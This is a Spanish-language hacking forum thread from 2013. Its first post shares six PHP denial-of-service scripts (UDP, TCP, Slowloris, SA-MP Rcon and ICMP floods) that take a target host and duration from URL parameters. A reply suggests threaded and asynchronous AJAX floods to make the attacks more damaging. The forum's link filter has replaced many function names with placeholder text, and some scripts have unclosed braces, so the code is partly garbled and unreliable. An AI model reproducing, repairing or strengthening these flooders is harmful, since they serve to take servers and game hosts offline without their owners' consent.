comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Metodos de DoS con PHP

  • 1 Respuestas
  • 1281 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Agosto 25, 2013, 11:59:51 pm »
UDP:

Código: PHP
  1.  <?php
  2. //UDP
  3. if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET['host'])&&No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET['time'])){
  4.     $packets = 0;
  5.     No tienes permisos para ver links. Registrate o Entra con tu cuenta(TRUE);
  6.     No tienes permisos para ver links. Registrate o Entra con tu cuenta(0);
  7.  
  8.    $exec_time = $_GET['time'];
  9.  
  10.    $time = No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  11.     $max_time = $time+$exec_time;
  12.  
  13.    $host = $_GET['host'];
  14.  
  15.    for($i=0;$i<65000;$i++){
  16.     $out .= 'X';
  17.     }
  18.     while(1){
  19.     $packets++;
  20.     if(No tienes permisos para ver links. Registrate o Entra con tu cuenta() > $max_time){
  21.     break;
  22.     }
  23.     $rand = No tienes permisos para ver links. Registrate o Entra con tu cuenta(1,65000);
  24.     $fp = No tienes permisos para ver links. Registrate o Entra con tu cuenta('udp://'.$host, $rand, $errno, $errstr, 5);
  25.     if($fp){
  26.     No tienes permisos para ver links. Registrate o Entra con tu cuenta($fp, $out);
  27.     No tienes permisos para ver links. Registrate o Entra con tu cuenta($fp);
  28.     }
  29. ?>

UDP Method 2

Código: PHP
  1.  <?php
  2.  
  3. $host = $_GET['host'];
  4. No tienes permisos para ver links. Registrate o Entra con tu cuenta(0);
  5. $exec_time = (int)$_GET['time'];
  6. $time = No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  7. $max_time = $time + $exec_time;
  8.  
  9.       if(No tienes permisos para ver links. Registrate o Entra con tu cuenta() > $max_time)
  10.  
  11.       {
  12.  
  13.          break;
  14.  
  15.       }
  16.  
  17. while(1){
  18.  
  19. $dataOut = “x08x00x10x26x74x65x73x74“;
  20.  
  21.       if ($_GET['port'] == "rand")
  22.  
  23.       {
  24.  
  25.          $rand = No tienes permisos para ver links. Registrate o Entra con tu cuenta(1,65535);
  26.  
  27.       }
  28.  
  29.       else
  30.  
  31.       {
  32.  
  33.          $rand = (int)filter($_GET['port']);
  34.  
  35.       }
  36.  
  37. $socket = No tienes permisos para ver links. Registrate o Entra con tu cuenta(AF_INET, SOCK_DGRAM, UDP);
  38.  
  39. No tienes permisos para ver links. Registrate o Entra con tu cuenta($socket);
  40.  
  41. No tienes permisos para ver links. Registrate o Entra con tu cuenta($socket, $host, $rand);
  42.  
  43. @No tienes permisos para ver links. Registrate o Entra con tu cuenta($socket, $dataOut, No tienes permisos para ver links. Registrate o Entra con tu cuenta($dataOut));
  44.  
  45. No tienes permisos para ver links. Registrate o Entra con tu cuenta($socket);}
  46.  
  47. echo "UDP flood complete after: {$exec_time} seconds";
  48. ?>

TCP

Código: PHP
  1.  <?php
  2.     //TCP
  3.     if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET['host'])&&No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET['time'])){
  4.         $packets = 0;
  5.         No tienes permisos para ver links. Registrate o Entra con tu cuenta(TRUE);
  6.         No tienes permisos para ver links. Registrate o Entra con tu cuenta(0);
  7.        
  8.         $exec_time = $_GET['time'];
  9.        
  10.         $time = No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  11.         $max_time = $time+$exec_time;
  12.      
  13.         $host = $_GET['host'];
  14.         $port = $_GET['port'];
  15.        
  16.         for($i=0;$i<65000;$i++){
  17.                 $out .= 'X';
  18.         }
  19.         while(1){
  20.         $packets++;
  21.                 if(No tienes permisos para ver links. Registrate o Entra con tu cuenta() > $max_time){
  22.                         break;
  23.                 }              
  24.                 $fp = No tienes permisos para ver links. Registrate o Entra con tu cuenta('tcp://'.$host, $port, $errno, $errstr, 5);
  25.                 if($fp){
  26.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta($fp, $out);
  27.                         No tienes permisos para ver links. Registrate o Entra con tu cuenta($fp);
  28.                 }
  29.     ?>

Slowloris

Código: PHP
  1.  <?php
  2. $ip = $_GET['ip'];
  3. No tienes permisos para ver links. Registrate o Entra con tu cuenta(0);
  4. No tienes permisos para ver links. Registrate o Entra con tu cuenta(FALSE);
  5.  
  6. $exec_time = $_GET['time'];
  7. $time = No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  8. $max_time = $time+$exec_time;
  9.  
  10. while(1){
  11.   if(No tienes permisos para ver links. Registrate o Entra con tu cuenta() > $max_time){
  12.     break;
  13.   }
  14.  
  15.   $fp = No tienes permisos para ver links. Registrate o Entra con tu cuenta($ip, 80, $errno, $errstr, 140);
  16.   if (!$fp) {
  17.     echo "$errstr ($errno)<br />\n";
  18.   } else {
  19.     $out = "POST / HTTP/1.1\r\n";
  20.     $out .= "Host: $ip\r\n";
  21.     $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
  22.     $out .= "Content-Length: 42\r\n\r\n";
  23.  
  24.     No tienes permisos para ver links. Registrate o Entra con tu cuenta($fp, $out);
  25. }
  26. }
  27. echo "Slowloris flood complete after: $exec_time seconds\n";
  28. ?>

SA-MP Rcon Flood

Código: PHP
  1.  <?php
  2. if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET['host'])&&No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET['port'])&&No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET['time'])){
  3.     $packets = 0;
  4.     $fakepass = "4azr46a";
  5.     $fakecmd = "exit";
  6.     $sPacket = "";  
  7.     No tienes permisos para ver links. Registrate o Entra con tu cuenta(TRUE);
  8.     No tienes permisos para ver links. Registrate o Entra con tu cuenta(0);
  9.    
  10.     $exec_time = $_GET['time'];    
  11.     $time = No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  12.     $max_time = $time+$exec_time;
  13.     $host = $_GET['host'];    
  14.     $port = $_GET['port'];    
  15.    
  16.     $aIPAddr = No tienes permisos para ver links. Registrate o Entra con tu cuenta('.', $host);
  17.     $sPacket .= "SAMP";
  18.  
  19.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta($aIPAddr[0]);
  20.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta($aIPAddr[1]);
  21.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta($aIPAddr[2]);
  22.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta($aIPAddr[3]);
  23.  
  24.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta($port & 0xFF);
  25.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta($port >> 8 & 0xFF);
  26.  
  27.     $sPacket .= 'x';
  28.    
  29.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta($fakepass) & 0xFF);
  30.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta($fakepass) >> 8 & 0xFF);
  31.     $sPacket .= $fakepass;
  32.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta($fakecmd) & 0xFF);
  33.     $sPacket .= No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta($fakecmd) >> 8 & 0xFF);
  34.     $sPacket .= $fakecmd;
  35.    
  36.     while(1){
  37.     $packets++;
  38.             if(No tienes permisos para ver links. Registrate o Entra con tu cuenta() > $max_time){
  39.                     break;
  40.             }
  41.             //$rand = rand(1,65000);
  42.             $fp = No tienes permisos para ver links. Registrate o Entra con tu cuenta('udp://'.$host, $port, $errno, $errstr, 2);
  43.             No tienes permisos para ver links. Registrate o Entra con tu cuenta($fp, $sPacket);
  44.             if($fp){
  45.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta($rSocket, $sPacket);
  46.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta($fp);
  47.             }
  48. ?>

ICMP

Código: PHP
  1.  <?php
  2.  
  3. $host = $_GET['host'];
  4. No tienes permisos para ver links. Registrate o Entra con tu cuenta(0);
  5. $exec_time = $_GET['time'];
  6. $time = No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  7. $max_time = $time + $exec_time;
  8.  
  9.       if(No tienes permisos para ver links. Registrate o Entra con tu cuenta() > $max_time)
  10.  
  11.       {
  12.  
  13.          break;
  14.  
  15.       }
  16.  
  17. while(1){
  18. // 08 (ECHO), 00 (No Code), 10 26 (Checksum), 74 65 73 74 (The data: “test”)
  19. $dataOut = “x08x00x10x26x74x65x73x74“;
  20.  
  21. // Raw socket, ICMP protocol
  22. $socket = No tienes permisos para ver links. Registrate o Entra con tu cuenta(AF_INET, SOCK_RAW, 1);
  23.  
  24. // Non blocking as in the actual script it is many sockets to different machines
  25. No tienes permisos para ver links. Registrate o Entra con tu cuenta($socket);
  26.  
  27. // Connect to local machine (or any machine)
  28. No tienes permisos para ver links. Registrate o Entra con tu cuenta($socket, $host, null);
  29.  
  30. // Send $dataOut
  31. @No tienes permisos para ver links. Registrate o Entra con tu cuenta($socket, $dataOut, No tienes permisos para ver links. Registrate o Entra con tu cuenta($dataOut));
  32.  
  33. // Close socket
  34. No tienes permisos para ver links. Registrate o Entra con tu cuenta($socket);}
  35.  
  36. echo "ICMP flood complete after: {$exec_time} seconds";
  37. ?>

El autor original de los codigos es: io.kent

Saludos!
ANTRAX


Desconectado WHK

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 3
  • 吴阿卡
    • Ver Perfil
    • WHK
« Respuesta #1 en: Agosto 30, 2013, 10:09:40 am »
Hola, se ven buenos pero todos son sincronicos, eso quiere decir que envia los paquetes uno por uno y eso no le hace daño a nadie, lo que si podría servir es hacer hilos de proceso con php ( No tienes permisos para ver links. Registrate o Entra con tu cuenta ), eso quiere decir enviar sus 100 paquetes simultaneos por segundo, eso si podría resultar.

Lo otro sería sin utilizar pecl utilizando ajax haciendo peticiones asincronicas, o sea hacer de 50 en 50 peticiones cada 1 segundo al archivo php pero puede correr el riesgo de que el servidor local colapse debido a que habrán demasiadas peticiones sin terminar, de alguna manera habría que controlar que se envien 50 conecciones y que cada ves que se desconecte una que lo vuelva a reconectar de manera automatica, eso si sería muy dañino y sin utilizar los famosos iframes que al final terminan consumiendo muchisima cpu.

También podrian hacerse ataques via ajax solicitando cabeceras de tipo json o xml debido a la politica de sitios cruzados de los navegadores, esta petición se abortará una ves terminada la solicitud asi que alcanzará de todas maneras a realizar el ataque sin problemas.

 

¿Te gustó el post? COMPARTILO!



[Sugerencia] Metodos de encriptacion de contraseñas

Iniciado por Only

Respuestas: 2
Vistas: 1068
Último mensaje Febrero 07, 2014, 12:45:05 pm
por alexander1712